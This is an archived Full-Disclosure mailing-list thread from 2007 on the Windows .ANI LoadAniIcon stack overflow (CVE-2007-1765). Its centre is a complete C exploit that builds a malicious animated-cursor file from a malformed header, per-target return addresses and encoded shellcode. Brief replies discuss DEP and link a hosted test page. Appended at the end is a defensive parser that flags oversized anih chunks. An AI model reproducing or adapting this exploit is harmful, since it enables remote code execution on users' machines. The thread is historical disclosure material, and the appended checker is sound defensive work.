>Has anyone actually tested this with DEP on/off to be sure?
>
>Larry Seltzer
>eWEEK.com Security Center Editor
>http://security.eweek.com/
>http://blog.eweek.com/blogs/larry_seltzer/
>Contributing Editor, PC Magazine
>[EMAIL PROTECTED]
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-01 Thread Larry Seltzer
>>The issue is that this only works with DEP turned off!

Interesting point. I haven't seen this mentioned anywhere, including the
Microsoft advisory
(http://www.microsoft.com/technet/security/advisory/935423.mspx).
 
Has anyone actually tested this with DEP on/off to be sure?
 
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry_seltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-03-31 Thread James Matthews

The issue is that this only works with DEP turned off!

On 3/31/07, dev code <[EMAIL PROTECTED]> wrote:


I didn't include the DoS version of this, it just calls ExitProcess(). If
you have SP2, you can try going to http://sicotik.com/ink/test.html.
Thanks.

>From: wac <[EMAIL PROTECTED]>
>To: "dev code" <[EMAIL PROTECTED]>
>CC: full-disclosure@lists.grok.org.uk
>Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
>Date: Sat, 31 Mar 2007 06:53:34 -0500
>
>Hello:
>
>Does this work in *fully patched* XP Pro + SP2? Mine seems to be totally
>immune (not even crashing). XP Pro + SP2 + 0 patches crashes (probably
>landing somewhere else in memory).
>
>
>On 3/30/07, dev code <[EMAIL PROTECTED]> wrote:

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-03-31 Thread dev code
I didn't include the DoS version of this, it just calls ExitProcess(). If 
you have SP2, you can try going to http://sicotik.com/ink/test.html. Thanks.



From: wac <[EMAIL PROTECTED]>
To: "dev code" <[EMAIL PROTECTED]>
CC: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
Date: Sat, 31 Mar 2007 06:53:34 -0500

Hello:

Does this work in *fully patched* XP Pro + SP2? Mine seems to be totally
immune (not even crashing). XP Pro + SP2 + 0 patches crashes (probably
landing somewhere else in memory).


On 3/30/07, dev code <[EMAIL PROTECTED]> wrote:



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-03-31 Thread wac

Hello:

Does this work in *fully patched* XP Pro + SP2? Mine seems to be totally
immune (not even crashing). XP Pro + SP2 + 0 patches crashes (probably
landing somewhere else in memory).


On 3/30/07, dev code <[EMAIL PROTECTED]> wrote:


[Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-03-30 Thread dev code
/*
* Copyright (c) 2007 devcode
*
*
*   ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow
* [CVE-2007-1765]
*
*
* Description:
*A vulnerability has been identified in Microsoft Windows,
* which could be exploited by remote attackers to take complete
* control of an affected system. This issue is due to a stack overflow
*error within the "LoadAniIcon()" [user32.dll] function when rendering
*cursors, animated cursors or icons with a malformed header, which could
* be exploited by remote attackers to execute arbitrary commands by
*tricking a user into visiting a malicious web page or viewing an email
*message containing a specially crafted ANI file.
*
* Hotfix/Patch:
*None as of this time.
*
* Vulnerable systems:
* Microsoft Windows 2000 Service Pack 4
* Microsoft Windows XP Service Pack 2
* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
* Microsoft Windows XP Professional x64 Edition
* Microsoft Windows Server 2003
* Microsoft Windows Server 2003 (Itanium)
* Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 Service Pack 1 (Itanium)
* Microsoft Windows Server 2003 x64 Edition
* Microsoft Windows Vista
*
* Microsoft Internet Explorer 6
* Microsoft Internet Explorer 7
*
*This is a PoC and was created for educational purposes only. The
* author is not held responsible if this PoC does not work or is
* used for any other purposes than the one stated above.
*
* Notes:
* For this to work on XP SP2 on explorer.exe, DEP has to be turned
* off.
*
*/
#include 

/* ANI Header */
unsigned char uszAniHeader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
"\x61\x6E\x69\x68\xA8\x03\x00\x00";

/* Shellcode - metasploit exec calc.exe ^^ */
unsigned char uszShellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";

char szIntro[] =
"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
"\t\t\tdevcode (c) 2007\n"
"[+] Targets:\n"
"\tWindows XP SP2 [0]\n"
"\tWindows 2K SP4 [1]\n\n"
"Usage: ani.exe <target> <file>";

typedef struct {
    const char *szTarget;
    unsigned char uszRet[5];
} TARGET;

TARGET targets[] = {
    { "Windows XP SP2", "\xC9\x29\xD4\x77" },   /* call esp */
    { "Windows 2K SP4", "\x29\x4C\xE1\x77" }
};

int main( int argc, char **argv ) {
    char szBuffer[1024];
    FILE *f;
    int iTarget;

    if ( argc < 3 ) {
        printf("%s\n", szIntro );
        return 0;
    }

    /* Target index must be one of the entries in targets[] */
    iTarget = atoi( argv[1] );
    if ( iTarget < 0 || iTarget >= (int)( sizeof( targets ) / sizeof( targets[0] ) ) ) {
        printf("[-] Unknown target, see the target list\n%s\n", szIntro );
        return 0;
    }

    printf("[+] Creating ANI header...\n");
    memset( szBuffer, 0x90, sizeof( szBuffer ) );               /* NOP fill */
    memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 ); /* RIFF/ACON header, 88 bytes */

    printf("[+] Copying shellcode...\n");
    memcpy( szBuffer + 168, targets[iTarget].uszRet, 4 );       /* saved return address */
    memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 );

    printf("%s\n", argv[2] );
    f = fopen( argv[2], "wb" );
    if ( f == NULL ) {
        printf("[-] Cannot create file\n");
        return 0;
    }

    fwrite( szBuffer, 1, sizeof( szBuffer ), f );
    fclose( f );
    printf("[+] .ANI file successfully created!\n");
    return 0;
}
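As an added example (not part of the PoC or of the original post), here is the check the advisory text implies a safe loader or a file scanner must perform: a RIFF chunk walker that refuses any anih chunk not declaring exactly the 36 bytes of the ANIHEADER structure, run against the PoC's own header bytes and a constructed benign file. ANIH_SIZE, ani_check and the benign sample are this example's own assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* sizeof(ANIHEADER): the fixed 36-byte struct LoadAniIcon copies an anih chunk into.
 * A safe loader rejects any anih chunk declaring another size before copying. */
#define ANIH_SIZE 36u

enum { ANI_OK = 0, ANI_BAD_ANIH_SIZE = 1, ANI_TRUNCATED = 2, ANI_NOT_ACON = 3 };

static uint32_t rd32(const unsigned char *p) {            /* little-endian DWORD */
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Walks the top-level RIFF chunks of buf and reports the first anih chunk whose
 * declared size is not ANIH_SIZE, or any chunk that overruns the buffer.
 * *bad_off receives the offset of the chunk header that triggered the report. */
int ani_check(const unsigned char *buf, size_t len, size_t *bad_off) {
    size_t off = 12;                                      /* skip "RIFF" size "ACON" */
    if (len < 12 || memcmp(buf, "RIFF", 4) || memcmp(buf + 8, "ACON", 4))
        return ANI_NOT_ACON;
    while (off + 8 <= len) {
        uint32_t size = rd32(buf + off + 4);
        if (bad_off) *bad_off = off;
        if (!memcmp(buf + off, "anih", 4) && size != ANIH_SIZE) return ANI_BAD_ANIH_SIZE;
        if (size > len - off - 8) return ANI_TRUNCATED;   /* declared size exceeds data */
        off += 8 + size + (size & 1);                     /* RIFF chunks are word-aligned */
    }
    return off == len ? ANI_OK : ANI_TRUNCATED;           /* dangling partial chunk header */
}

/* The 88-byte header the PoC above writes (before the ret address and shellcode):
 * its second anih chunk, at offset 80, declares 0x3A8 (936) bytes. */
const unsigned char poc_header[] =
    "\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
    "\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
    "\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
    "\x61\x6E\x69\x68\xA8\x03\x00\x00";
const size_t poc_header_len = sizeof poc_header - 1;

/* Constructed benign file: RIFF/ACON holding one anih chunk of exactly 36 bytes
 * (cbSize, nFrames, nSteps, four zero fields, iDispRate, bfAttributes). */
const unsigned char benign_ani[] =
    "RIFF\x30\x00\x00\x00" "ACON" "anih\x24\x00\x00\x00"
    "\x24\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x0A\x00\x00\x00\x01\x00\x00\x00";
const size_t benign_ani_len = sizeof benign_ani - 1;
```

Run against a full 1024-byte PoC file the overrun check passes (936 bytes are present) and the size check alone catches it, which is why the anih size test comes first.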
